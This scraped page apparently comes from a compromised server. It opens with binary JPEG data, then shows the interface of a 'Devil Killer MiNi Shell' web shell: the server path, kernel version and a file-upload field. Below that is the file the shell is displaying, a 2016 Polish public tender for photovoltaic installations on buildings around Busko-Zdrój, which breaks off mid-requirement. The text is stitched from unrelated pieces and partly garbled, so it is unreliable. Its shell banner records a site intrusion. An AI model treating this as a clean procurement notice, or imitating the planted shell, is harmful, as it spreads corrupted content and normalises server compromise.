JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161028/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20161028/332446-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://bip.umig.busko.pl' target='_blank'>http://bip.umig.busko.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 332446 - 2016
              z dnia 2016-10-28 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Busko-Zdrój: Zaprojektowanie i wykonanie ogniw fotowoltaicznych na budynkach użyteczności publicznej w ramach projektu pn. Instalacja systemów energii odnawialnej na budynkach użyteczności publicznej i domach prywatnych w gminach powiatu buskiego i pińczowskiego
<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Burmistrz Miasta i Gminy, krajowy numer identyfikacyjny
              52369500000, ul.
              ul. Adama Mickiewicza 
              10,
              28100  
              Busko-Zdrój, woj.
              świętokrzyskie, państwo
              Polska, tel.
              413 705 200, e-mail
              , faks
              413 705 290.
              <br />
              Adres strony internetowej (URL): http://bip.umig.busko.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />http://bip.umig.busko.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://bip.umig.busko.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Postępowanie o udzielenie zamówienia, z zastrzeżeniem wyjątków określonych w ustawie, prowadzi się z zachowaniem formy pisemnej.<br />
                Adres:
                <br />Urząd Miasta i Gminy w Busku - Zdroju, ul. Mickiewicza 10, 28-100 Busko Zdrój, pok. Nr 3 (Biuro Obsługi Interesanta) </div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Zaprojektowanie i wykonanie ogniw fotowoltaicznych na budynkach użyteczności publicznej w ramach projektu pn. Instalacja systemów energii odnawialnej na budynkach użyteczności publicznej i domach prywatnych w gminach powiatu buskiego i pińczowskiego
<br /><b>Numer referencyjny: </b>ZP.271.30.2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />7<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiot zamówienia obejmuje kompleksowe zaprojektowanie i wybudowanie: systemów modułów fotowoltaicznych, wytwarzających energię elektryczną, zainstalowanych na terenie nieruchomości stanowiących własność Gmin Partnerskich. Wykaz budynków objętych projektem zawarty jest w załączniku nr 1 do PFU.
Przedmiot zamówienia podzielony został na siedem, następujących zadań:
Zadanie nr 1  Zaprojektowanie i wykonanie ogniw fotowoltaicznych na budynkach użyteczności publicznej na terenie Powiatu Buskiego
Obiekty objęte zamówieniem: 
1. Zespół Opieki Zdrowotnej w Busku - Zdroju 
- ZOZ Budynek Główny
- ZOZ Oddział Zakaźny 
- ZOZ Oddział Płucny	
ul. Boh. Warszawy 67,28-100 Busko-Zdrój
2. Komenda Powiatowa Państwowej Straży Pożarnej w Busku - Zdroju ul. Waryńskiego 29a,28-100 Busko-Zdrój
Zadanie nr 2  Zaprojektowanie i wykonanie ogniw fotowoltaicznych na budynkach użyteczności publicznej na terenie Gminy Busko-Zdrój
Obiekty objęte zamówieniem: 
1. Szkoła Podstawowa w Szańcu gm. Busko-Zdrój, Szaniec 240, 
28-100 Busko-Zdrój
2. Szkoła Podstawowa w Kołaczkowicach gm. Busko-Zdrój, Kołaczkowice 122, 
28-100 Busko-Zdrój
3. Samorządowe Gimnazjum w Podgajach gm. Busko-Zdrój, Podgaje 92a; 
28-100 Busko Zdrój
4. Publiczne Przedszkole nr 2 w Busko-Zdroju,	osiedle Tadeusza Kościuszki 14, 28-100 Busko-Zdrój
5. Publiczne Przedszkole nr 3 w Busko-Zdroju,	osiedle Gen. Sikorskiego 12, 28-100 Busko-Zdrój
6. Ośrodek Zdrowia w Dobrowodzie gm. Busko-Zdrój	Dobrowoda 24,
28-100 Busko-Zdrój
7. Samodzielny Publiczny Zespół Podstawowej Opieki Zdrowotnej,	ul Sądowa 9, 28-100 Busko-Zdrój
8. Ośrodek Zdrowia w Kołaczkowicach gm. Busko-Zdrój	Kołaczkowice 11,
28-100 Busko-Zdrój
9. Miejsko-Gminna Biblioteka Publiczna w Busko-Zdroju	osiedle Gen. Świerczewskiego 17, 28-100 Busko-Zdrój
Zadanie nr 3  Zaprojektowanie i wykonanie ogniw fotowoltaicznych na budynkach użyteczności publicznej na terenie Gminy Wiślica
Obiekty objęte zamówieniem: 
1. Samorządowy Zakład Opieki Zdrowotnej w Wiślicy Kilińskiego 19, 
28-160 Wiślica
2. Zespół szkolno-przedszkolny z halą sportową Wiślica	Podwale 1, 
28-160 Wiślica
3.Oczyszczalnia ścieków w Jurkowie Jurków 28-160 Wiślica
Zadanie nr 4  Zaprojektowanie i wykonanie ogniw fotowoltaicznych na budynkach użyteczności publicznej na terenie Gminy Pińczów
Obiekty objęte zamówieniem: 
1. Oczyszczalnia ścieków w Gackach Gacki, 28-400 Leszcze
2. Ośrodek Sportu i Rekreacji w Pińczowie ul. Pałęki 26, 28-400 Pińczów
3. Urząd Miejski ul. 3 Maja 10 w Pińczowie 3 Maja 10, 28-400 Pińczów
4. Pływalna Miejska Delfinek w Pińczowie ul. 7 Źródeł 7, 28-400 Pińczów
Zadanie nr 5  Zaprojektowanie i wykonanie ogniw fotowoltaicznych na budynkach użyteczności publicznej na terenie Gminy Nowy Korczyn
Obiekty objęte zamówieniem: 
1. Związek Nida 2000 w Starym Korczynie	Stary Korczyn, 28-136 Nowy Korczyn
2. Przepompownia ścieków ssąco-tłocząca w Nowym Korczynie, 28-136 Nowy Korczyn
3. Stacja uzdatniania wody w Nowym Korczynie, 28-136 Nowy Korczyn
Zadanie nr 6  Zaprojektowanie i wykonanie ogniw fotowoltaicznych na budynkach użyteczności publicznej na terenie Gminy Stopnica
Obiekty objęte zamówieniem: 
1. Budynek pływalni w Stopnicy	Sportowa 4, 28-130 Stopnica
2. Oczyszczalnia ścieków w miejscowości Falęcin Stary gm. Stopnica Falęcin Stary, 28-130 Stopnica
3. Budynek Urzędu Miasta i Gminy w Stopnicy ul. Kościuszki 2, 28-130 Stopnica
Zadanie nr 7  Zaprojektowanie i wykonanie ogniw fotowoltaicznych na budynkach użyteczności publicznej na terenie Gminy Sędziszów 
Obiekty objęte zamówieniem: 
1. Fundacja Kreatywnej Przestrzeni i Rozwoju CampoSfera w Klimontowie gm. Sędziszów Klimontów 31, 28-340 Klimontów
2. Ośrodek Sportu i Rekreacji w Sędziszowie ul. Dworcowa 20A, 
28-340 Sędziszów.
Uzyskana energia elektryczna zużywana będzie przede wszystkim na potrzeby własne obiektów, a ewentualny nadmiar energii elektrycznej oddawany będzie do sieci energetycznej celem skumulowania i odebrania jej na zasadzie net-metering wg tzw. Ustawy o Odnawialnych Źródłach Energii.
Bilans energetyczny dla każdego z obiektów wykazano w audytach energetycznych dla każdego z budynków, które stanowią załącznik nr 2 do PFU.
Wykonawca powinien zapewnić monitoring poszczególnych instalacji, można zastosować wbudowane urządzenia służące do monitoringu lub stworzyć system monitoringu. Urządzenia do monitoringu mają za zadanie monitorowanie pracy systemu, pod kątem sprawności, uzysków, wartości napięć i prądów. Urządzenie monitoringu umożliwiać powinno również odczytywanie danych w sieci internetowej, po zalogowaniu się na stronie np. producenta urządzenia. Istnieje też możliwość monitorowania pracy instalacji za pomocą aplikacji dla urządzeń mobilnych.
W ramach przedmiotu zamówienia w zakresie wykonawstwa, wykonawca wykona prace budowlane obejmujące wskazane adresy inwestycji:
W zakresie prac instalacyjnych:
 montaż konstrukcji pod moduły PV,
 montaż modułów PV na konstrukcji, 
 ułożenie tras kablowych i kabli od modułów PV do rozdzielnicy elektrycznej, 
 modernizacja rozdzielnicy elektrycznej, w tym montaż zabezpieczeń, 
 montaż inwerterów PV, 
 montaż układu automatyki i monitorowania, 
 podłączenia inwerterów modułów PV do systemu elektroenergetycznego inwestora,
 wykonanie prób instalacji oraz sprawdzających prawidłowe działanie aparatury, 
 uruchomienie układu i regulacje, 
 szkolenie z obsługi wykonanej instalacji; 
W zakresie prac budowlanych
 wykonanie niezbędnych otworów montażowych w celu wprowadzenia urządzeń, 
 zamurowanie otworów montażowych po wprowadzeniu urządzeń, 
 wykonanie przepustów w miejscach przejść tras kablowych przez ściany, dach lub inne przeszkody,
 uszczelnienie przepustów,
 wykonanie prac mających na celu doprowadzenie obiektów do stanu pierwotnego.
Planowana inwestycja pn. Zaprojektowanie i wykonanie ogniw fotowoltaicznych na budynkach użyteczności publicznej., będzie realizowana w ramach Szwajcarsko-Polskiego Programu Współpracy, Obszaru priorytetowego Środowisko i Infrastruktura, obszaru tematycznego Odbudowa, remont, przebudowa i rozbudowa podstawowej infrastruktury oraz poprawa stanu środowiska Celu 2 Zwiększenie efektywności energetycznej i redukcja emisji, w szczególności gazów cieplarnianych i niebezpiecznych substancji zmierzającej do zwiększenia efektywności energetycznej i reedukacji emisji w szczególności gazów cieplarnianych 
i niebezpiecznych substancji poprzez wprowadzenie systemów energii. 
Szczegółowy opis przedmiotu zamówienia zawarty został w następujących dokumentach: 
a) Wzorze umowy  stanowiącej Załącznik nr 7 do SIWZ, 
b)Programie funkcjonalno-użytkowym  stanowiącym Załącznik nr 9 do SIWZ.

<br /><br /><b>II.5) Główny kod CPV: </b>45000000-7<br /><b> Dodatkowe kody CPV:</b>71300000-1,
                42510000-4,
                31122000-7,
                09330000-1<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                tak
                <br />
                Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp:
                Zamawiający przewiduje udzielenie zamówień powtarzających, o których mowa w art. 67 ust. 1 pkt. 6 ustawy, do 50% wartości zamówienia podstawowego. Wartość zamówienia powtarzającego zostanie obliczona na podstawie  średnich cen jednostkowych za 1kWp instalacji fotowoltaicznych, wynikających z zamówienia podstawowego wyznaczonych dla instalacji fotowoltaicznych zgodnie z załącznikiem Nr 1 do formularza ofertowego w następujących przedziałach mocowych: 0  5 kWp, 5  15 kWp, powyżej 15kWp.<br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 28/02/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Na potwierdzenie należy złożyć: oświadczenie zgodnie z założeniami w pkt. 9.3.  Zamawiający w tym zakresie nie stawia żadnych wymagań.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Na potwierdzenie należy złożyć:
a) informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym niż 1 miesiąc przed upływem terminu składania ofert Wykonawca potwierdzi spełnienie warunku jeżeli wykaże że posiada nie mniej niż  Dla Zadania nr 1: 300 000,00 PLN środków lub zdolność kredytową w tej samej wysokości; Dla Zadania nr 2: 700 000,00 PLN środków lub zdolność kredytową w tej samej wysokości; Dla Zadania nr 3: 300 000,00 PLN środków lub zdolność kredytową w tej samej wysokości; Dla Zadania nr 4: 500 000,00 PLN środków lub zdolność kredytową w tej samej wysokości; Dla Zadania nr 5: 500 000,00 PLN środków lub zdolność kredytową w tej samej wysokości; Dla Zadania nr 6: 400 000,00 PLN środków lub zdolność kredytową w tej samej wysokości; Dla Zadania nr 7: 150 000,00 PLN środków lub zdolność kredytową w tej samej wysokości.
W przypadku składania ofert na kilka zadań wartości te podlegają sumowaniu.
b) Dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną określoną przez zamawiającego - to jest wykonywaniem robót budowlanych na kwotę nie mniejszą niż  Dla Zadania nr 1:  400 000,00 PLN; Dla Zadania nr 2: 800 000,00 PLN, Dla Zadania nr 3: 400 000,00 PLN, Dla Zadania nr 4: 600 000,00 PLN, Dla Zadania nr 5: 600 000,00 PLN, Dla Zadania nr 6: 500 000,00 PLN, Dla Zadania nr 7: 200 000,00 PLN.
W przypadku składania ofert na kilka zadań wartości te podlegają sumowaniu.
<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                a) wykonanych robót i usług
Na potwierdzenie niniejszego warunku należy złożyć wykazu robót budowlanych i usług wykonanych nie wcześniej niż w okresie ostatnich 5 lat dla robót i 3 lat dla usług przed upływem terminu składania ofert o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty i usługi te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane i usługi zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  inne dokumenty; 
Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że w tym okresie wykonał:
Dla Zadania nr 1:
1) W ramach jednego zadania instalację ogniw fotowoltaicznych w trybie zaprojektuj i wybuduj, 
o mocy min. 40 kWp i wartości minimum 250 000,00 zł brutto. 
LUB
2)łącznie:
a. W ramach jednego zadania instalację ogniw fotowoltaicznych, o mocy min. 40 kWp 
oraz
b. W ramach jednego zadania projekt instalacji ogniw fotowoltaicznych, o mocy min. 40 kWp, 
których łączna wartość wyniosła, co najmniej 250 000,00 zł brutto.
Do każdej pozycji wykazu należy załączyć dowody określające, czy roboty i usługi te zostały wykonane w sposób należyty, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone.
Dla Zadania nr 2:
1) W ramach jednego zadania instalacji ogniw fotowoltaicznych w trybie zaprojektuj i wybuduj, 
o łącznej mocy min. 80 kWp i wartości minimum 500 000,00 zł brutto. 
LUB
2) łącznie:
a. W ramach jednego zadania instalacji ogniw fotowoltaicznych, o łącznej mocy min. 80 kWp 
oraz
b. W ramach jednego zadania projektów instalacji ogniw fotowoltaicznych, o łącznej mocy min. 80 kWp, 
których łączna wartość wyniosła, co najmniej 500 000,00 zł brutto.
Do każdej pozycji wykazu należy załączyć dowody określające, czy roboty i usługi te zostały wykonane w sposób należyty, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone.
Dla Zadania nr 3:
1) W ramach jednego zadania instalacje ogniw fotowoltaicznych w trybie zaprojektuj i wybuduj, o łącznej mocy min. 30 kWp i wartości minimum 250 000,00 zł brutto. 
LUB
2) łącznie:
a. W ramach jednego zadania instalacje ogniw fotowoltaicznych, o łącznej mocy min. 30 kWp 
oraz
b. W ramach jednego zadania projekty instalacji ogniw fotowoltaicznych, o łącznej mocy min. 30 kWp, 
których łączna wartość wyniosła, co najmniej 250 000,00 zł brutto.
Do każdej pozycji wykazu należy załączyć dowody określające, czy roboty i usługi te zostały wykonane w sposób należyty, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone.
Dla Zadania nr 4:
1) W ramach jednego zadania instalacje ogniw fotowoltaicznych w trybie zaprojektuj i wybuduj, o łącznej mocy min. 60 kWp i wartości minimum 350 000,00 zł brutto. 
LUB
2) łącznie:
a. W ramach jednego zadania instalacje ogniw fotowoltaicznych, o łącznej mocy min. 60 kWp 
oraz
b. W ramach jednego zadania projekty instalacji ogniw fotowoltaicznych, o łącznej mocy min. 60 kWp, 
których łączna wartość wyniosła, co najmniej 350 000,00 zł brutto.
Do każdej pozycji wykazu należy załączyć dowody określające, czy roboty i usługi te zostały wykonane w sposób należyty, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone.
Dla Zadania nr 5:
3) W ramach jednego zadania instalacje ogniw fotowoltaicznych w trybie zaprojektuj i wybuduj, o łącznej mocy min. 70 kWp i wartości minimum 400 000,00 zł brutto. 
LUB
4) łącznie:
a. W ramach jednego zadania instalacje ogniw fotowoltaicznych, o łącznej mocy min. 70 kWp 
oraz
b. W ramach jednego zadania projekty instalacji ogniw fotowoltaicznych, o łącznej mocy min. 70 kWp, 
których łączna wartość wyniosła, co najmniej 400 000,00 zł brutto.
Do każdej pozycji wykazu należy załączyć dowody określające, czy roboty i usługi te zostały wykonane w sposób należyty, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone.
Dla Zadania nr 6:
3) W ramach jednego zadania instalacje ogniw fotowoltaicznych w trybie zaprojektuj i wybuduj, o łącznej mocy min. 60 kWp i wartości minimum 300 000,00 zł brutto. 
LUB
4) łącznie:
a. W ramach jednego zadania instalacje ogniw fotowoltaicznych, o łącznej mocy min. 60 kWp 
oraz
b. W ramach jednego zadania projekty instalacji ogniw fotowoltaicznych, o łącznej mocy min. 60 kWp, 
których łączna wartość wyniosła, co najmniej 300 000,00 zł brutto.
Do każdej pozycji wykazu należy załączyć dowody określające, czy roboty i usługi te zostały wykonane w sposób należyty, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone.
Dla Zadania nr 7:
3) W ramach jednego zadania instalację ogniw fotowoltaicznych w trybie zaprojektuj i wybuduj, o mocy min. 30 kWp i wartości minimum 150 000,00 zł brutto. 
LUB
4) łącznie:
a.W ramach jednego zadania instalację ogniw fotowoltaicznych, o mocy min. 30 kWp 
oraz
